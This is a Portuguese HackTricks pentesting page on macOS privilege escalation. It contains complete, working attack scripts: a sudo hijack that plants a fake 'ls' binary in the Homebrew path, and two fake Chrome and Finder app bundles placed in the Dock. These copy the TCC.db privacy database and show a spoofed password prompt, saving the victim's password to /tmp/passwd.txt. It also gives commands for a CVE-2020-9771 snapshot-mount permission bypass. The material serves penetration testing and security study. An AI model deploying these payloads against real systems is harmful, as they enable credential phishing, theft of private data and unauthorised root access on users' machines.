mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-24 03:53:29 +00:00
263 lines
12 KiB
Markdown
263 lines
12 KiB
Markdown
|
# Escalação de Privilégios no macOS
|
||
|
|
||
|
<details>
|
||
|
|
||
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||
|
|
||
|
* Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
|
||
|
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||
|
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
|
||
|
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||
|
* **Compartilhe seus truques de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||
|
|
||
|
</details>
|
||
|
|
||
|
## Escalação de Privilégios TCC
|
||
|
|
||
|
Se você veio aqui procurando por escalação de privilégios TCC, vá para:
|
||
|
|
||
|
{% content-ref url="macos-security-protections/macos-tcc/" %}
|
||
|
[macos-tcc](macos-security-protections/macos-tcc/)
|
||
|
{% endcontent-ref %}
|
||
|
|
||
|
## Privesc no Linux
|
||
|
|
||
|
Por favor, note que **a maioria dos truques de escalação de privilégios que afetam o Linux/Unix também afetarão as máquinas MacOS**. Portanto, veja:
|
||
|
|
||
|
{% content-ref url="../../linux-hardening/privilege-escalation/" %}
|
||
|
[privilege-escalation](../../linux-hardening/privilege-escalation/)
|
||
|
{% endcontent-ref %}
|
||
|
|
||
|
## Interação do Usuário
|
||
|
|
||
|
### Sequestro do Sudo
|
||
|
|
||
|
Você pode encontrar a técnica original de **Sequestro do Sudo** no post de **Escalação de Privilégios no Linux**](../../linux-hardening/privilege-escalation/#sudo-hijacking).
|
||
|
|
||
|
No entanto, o macOS **mantém** o **`PATH`** do usuário quando ele executa o **`sudo`**. O que significa que outra maneira de realizar esse ataque seria **sequestrar outros binários** que a vítima executará ao **executar o sudo:**
|
||
|
```bash
|
||
|
# Let's hijack ls in /opt/homebrew/bin, as this is usually already in the users PATH
|
||
|
cat > /opt/homebrew/bin/ls <<EOF
|
||
|
#!/bin/bash
|
||
|
if [ "\$(id -u)" -eq 0 ]; then
|
||
|
whoami > /tmp/privesc
|
||
|
fi
|
||
|
/bin/ls "\$@"
|
||
|
EOF
|
||
|
chmod +x /opt/homebrew/bin/ls
|
||
|
|
||
|
# victim
|
||
|
sudo ls
|
||
|
```
|
||
|
Observe que um usuário que usa o terminal provavelmente terá o **Homebrew instalado**. Portanto, é possível sequestrar binários em **`/opt/homebrew/bin`**.
|
||
|
|
||
|
### Impersonação do Dock
|
||
|
|
||
|
Usando **engenharia social**, você pode **se passar, por exemplo, pelo Google Chrome** dentro do dock e executar seu próprio script:
|
||
|
|
||
|
{% tabs %}
|
||
|
{% tab title="Impersonação do Chrome" %}
|
||
|
Algumas sugestões:
|
||
|
|
||
|
* Verifique no dock se há um Chrome e, nesse caso, **remova** essa entrada e **adicione** a **entrada falsa do Chrome na mesma posição** no array do dock.
|
||
|
```bash
|
||
|
#!/bin/sh
|
||
|
|
||
|
# THIS REQUIRES GOOGLE CHROME TO BE INSTALLED (TO COPY THE ICON)
|
||
|
# If you want to removed granted TCC permissions: > delete from access where client LIKE '%Chrome%';
|
||
|
|
||
|
rm -rf /tmp/Google\ Chrome.app/ 2>/dev/null
|
||
|
|
||
|
# Create App structure
|
||
|
mkdir -p /tmp/Google\ Chrome.app/Contents/MacOS
|
||
|
mkdir -p /tmp/Google\ Chrome.app/Contents/Resources
|
||
|
|
||
|
# Payload to execute
|
||
|
cat > /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.c <<EOF
|
||
|
#include <stdio.h>
|
||
|
#include <stdlib.h>
|
||
|
#include <unistd.h>
|
||
|
|
||
|
int main() {
|
||
|
char *cmd = "open /Applications/Google\\\\ Chrome.app & "
|
||
|
"sleep 2; "
|
||
|
"osascript -e 'tell application \"Finder\"' -e 'set homeFolder to path to home folder as string' -e 'set sourceFile to POSIX file \"/Library/Application Support/com.apple.TCC/TCC.db\" as alias' -e 'set targetFolder to POSIX file \"/tmp\" as alias' -e 'duplicate file sourceFile to targetFolder with replacing' -e 'end tell'; "
|
||
|
"PASSWORD=\$(osascript -e 'Tell application \"Finder\"' -e 'Activate' -e 'set userPassword to text returned of (display dialog \"Enter your password to update Google Chrome:\" default answer \"\" with hidden answer buttons {\"OK\"} default button 1 with icon file \"Applications:Google Chrome.app:Contents:Resources:app.icns\")' -e 'end tell' -e 'return userPassword'); "
|
||
|
"echo \$PASSWORD > /tmp/passwd.txt";
|
||
|
system(cmd);
|
||
|
return 0;
|
||
|
}
|
||
|
EOF
|
||
|
|
||
|
gcc /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.c -o /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome
|
||
|
rm -rf /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.c
|
||
|
|
||
|
chmod +x /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome
|
||
|
|
||
|
# Info.plist
|
||
|
cat << EOF > /tmp/Google\ Chrome.app/Contents/Info.plist
|
||
|
<?xml version="1.0" encoding="UTF-8"?>
|
||
|
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
|
||
|
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
|
||
|
<plist version="1.0">
|
||
|
<dict>
|
||
|
<key>CFBundleExecutable</key>
|
||
|
<string>Google Chrome</string>
|
||
|
<key>CFBundleIdentifier</key>
|
||
|
<string>com.google.Chrome</string>
|
||
|
<key>CFBundleName</key>
|
||
|
<string>Google Chrome</string>
|
||
|
<key>CFBundleVersion</key>
|
||
|
<string>1.0</string>
|
||
|
<key>CFBundleShortVersionString</key>
|
||
|
<string>1.0</string>
|
||
|
<key>CFBundleInfoDictionaryVersion</key>
|
||
|
<string>6.0</string>
|
||
|
<key>CFBundlePackageType</key>
|
||
|
<string>APPL</string>
|
||
|
<key>CFBundleIconFile</key>
|
||
|
<string>app</string>
|
||
|
</dict>
|
||
|
</plist>
|
||
|
EOF
|
||
|
|
||
|
# Copy icon from Google Chrome
|
||
|
cp /Applications/Google\ Chrome.app/Contents/Resources/app.icns /tmp/Google\ Chrome.app/Contents/Resources/app.icns
|
||
|
|
||
|
# Add to Dock
|
||
|
defaults write com.apple.dock persistent-apps -array-add '<dict><key>tile-data</key><dict><key>file-data</key><dict><key>_CFURLString</key><string>/tmp/Google Chrome.app</string><key>_CFURLStringType</key><integer>0</integer></dict></dict></dict>'
|
||
|
sleep 0.1
|
||
|
killall Dock
|
||
|
```
|
||
|
{% tab title="Impersonação do Finder" %}
|
||
|
Algumas sugestões:
|
||
|
|
||
|
* Você **não pode remover o Finder do Dock**, então se você pretende adicioná-lo ao Dock, você pode colocar o Finder falso ao lado do real. Para isso, você precisa **adicionar a entrada do Finder falso no início do array do Dock**.
|
||
|
* Outra opção é não colocá-lo no Dock e apenas abri-lo, "Finder pedindo para controlar o Finder" não é tão estranho.
|
||
|
```bash
|
||
|
#!/bin/sh
|
||
|
|
||
|
# THIS REQUIRES Finder TO BE INSTALLED (TO COPY THE ICON)
|
||
|
# If you want to removed granted TCC permissions: > delete from access where client LIKE '%finder%';
|
||
|
|
||
|
rm -rf /tmp/Finder.app/ 2>/dev/null
|
||
|
|
||
|
# Create App structure
|
||
|
mkdir -p /tmp/Finder.app/Contents/MacOS
|
||
|
mkdir -p /tmp/Finder.app/Contents/Resources
|
||
|
|
||
|
# Payload to execute
|
||
|
cat > /tmp/Finder.app/Contents/MacOS/Finder.c <<EOF
|
||
|
#include <stdio.h>
|
||
|
#include <stdlib.h>
|
||
|
#include <unistd.h>
|
||
|
|
||
|
int main() {
|
||
|
char *cmd = "open /System/Library/CoreServices/Finder.app & "
|
||
|
"sleep 2; "
|
||
|
"osascript -e 'tell application \"Finder\"' -e 'set homeFolder to path to home folder as string' -e 'set sourceFile to POSIX file \"/Library/Application Support/com.apple.TCC/TCC.db\" as alias' -e 'set targetFolder to POSIX file \"/tmp\" as alias' -e 'duplicate file sourceFile to targetFolder with replacing' -e 'end tell'; "
|
||
|
"PASSWORD=\$(osascript -e 'Tell application \"Finder\"' -e 'Activate' -e 'set userPassword to text returned of (display dialog \"Finder needs to update some components. Enter your password:\" default answer \"\" with hidden answer buttons {\"OK\"} default button 1 with icon file \"System:Library:CoreServices:Finder.app:Contents:Resources:Finder.icns\")' -e 'end tell' -e 'return userPassword'); "
|
||
|
"echo \$PASSWORD > /tmp/passwd.txt";
|
||
|
system(cmd);
|
||
|
return 0;
|
||
|
}
|
||
|
EOF
|
||
|
|
||
|
gcc /tmp/Finder.app/Contents/MacOS/Finder.c -o /tmp/Finder.app/Contents/MacOS/Finder
|
||
|
rm -rf /tmp/Finder.app/Contents/MacOS/Finder.c
|
||
|
|
||
|
chmod +x /tmp/Finder.app/Contents/MacOS/Finder
|
||
|
|
||
|
# Info.plist
|
||
|
cat << EOF > /tmp/Finder.app/Contents/Info.plist
|
||
|
<?xml version="1.0" encoding="UTF-8"?>
|
||
|
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
|
||
|
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
|
||
|
<plist version="1.0">
|
||
|
<dict>
|
||
|
<key>CFBundleExecutable</key>
|
||
|
<string>Finder</string>
|
||
|
<key>CFBundleIdentifier</key>
|
||
|
<string>com.apple.finder</string>
|
||
|
<key>CFBundleName</key>
|
||
|
<string>Finder</string>
|
||
|
<key>CFBundleVersion</key>
|
||
|
<string>1.0</string>
|
||
|
<key>CFBundleShortVersionString</key>
|
||
|
<string>1.0</string>
|
||
|
<key>CFBundleInfoDictionaryVersion</key>
|
||
|
<string>6.0</string>
|
||
|
<key>CFBundlePackageType</key>
|
||
|
<string>APPL</string>
|
||
|
<key>CFBundleIconFile</key>
|
||
|
<string>app</string>
|
||
|
</dict>
|
||
|
</plist>
|
||
|
EOF
|
||
|
|
||
|
# Copy icon from Finder
|
||
|
cp /System/Library/CoreServices/Finder.app/Contents/Resources/Finder.icns /tmp/Finder.app/Contents/Resources/app.icns
|
||
|
|
||
|
# Add to Dock
|
||
|
defaults write com.apple.dock persistent-apps -array-add '<dict><key>tile-data</key><dict><key>file-data</key><dict><key>_CFURLString</key><string>/tmp/Finder.app</string><key>_CFURLStringType</key><integer>0</integer></dict></dict></dict>'
|
||
|
sleep 0.1
|
||
|
killall Dock
|
||
|
```
|
||
|
{% endtab %}
|
||
|
{% endtabs %}
|
||
|
|
||
|
## TCC - Escalada de Privilégios de Root
|
||
|
|
||
|
### CVE-2020-9771 - Bypass do TCC mount\_apfs e escalada de privilégios
|
||
|
|
||
|
**Qualquer usuário** (mesmo os não privilegiados) pode criar e montar um snapshot do time machine e **acessar TODOS os arquivos** desse snapshot.\
|
||
|
O **único privilégio** necessário é para o aplicativo usado (como o `Terminal`) ter **Acesso Total ao Disco** (FDA) (`kTCCServiceSystemPolicyAllfiles`), que precisa ser concedido por um administrador.
|
||
|
|
||
|
{% code overflow="wrap" %}
|
||
|
```bash
|
||
|
# Create snapshot
|
||
|
tmutil localsnapshot
|
||
|
|
||
|
# List snapshots
|
||
|
tmutil listlocalsnapshots /
|
||
|
Snapshots for disk /:
|
||
|
com.apple.TimeMachine.2023-05-29-001751.local
|
||
|
|
||
|
# Generate folder to mount it
|
||
|
cd /tmp # I didn it from this folder
|
||
|
mkdir /tmp/snap
|
||
|
|
||
|
# Mount it, "noowners" will mount the folder so the current user can access everything
|
||
|
/sbin/mount_apfs -o noowners -s com.apple.TimeMachine.2023-05-29-001751.local /System/Volumes/Data /tmp/snap
|
||
|
|
||
|
# Access it
|
||
|
ls /tmp/snap/Users/admin_user # This will work
|
||
|
```
|
||
|
{% endcode %}
|
||
|
|
||
|
Uma explicação mais detalhada pode ser encontrada no [**relatório original**](https://theevilbit.github.io/posts/cve\_2020\_9771/)**.**
|
||
|
|
||
|
## Informações Sensíveis
|
||
|
|
||
|
Isso pode ser útil para elevar privilégios:
|
||
|
|
||
|
{% content-ref url="macos-files-folders-and-binaries/macos-sensitive-locations.md" %}
|
||
|
[macos-sensitive-locations.md](macos-files-folders-and-binaries/macos-sensitive-locations.md)
|
||
|
{% endcontent-ref %}
|
||
|
|
||
|
###
|
||
|
|
||
|
|
||
|
|
||
|
<details>
|
||
|
|
||
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||
|
|
||
|
* Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
|
||
|
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||
|
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
|
||
|
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||
|
* **Compartilhe seus truques de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||
|
|
||
|
</details>
|